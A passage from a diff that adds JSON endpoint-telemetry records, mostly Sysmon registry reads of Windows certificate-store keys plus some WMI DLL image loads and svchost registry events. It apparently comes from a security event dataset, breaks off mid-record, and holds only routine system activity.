+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788700016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573788700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wfascim.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wfascim.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573788550000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wbemprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", 
+ "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmitomi.dll", + "image_path": "C:\\Windows\\System32\\wmitomi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573789020000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": 
"c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573790420000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573790740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573790740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": 
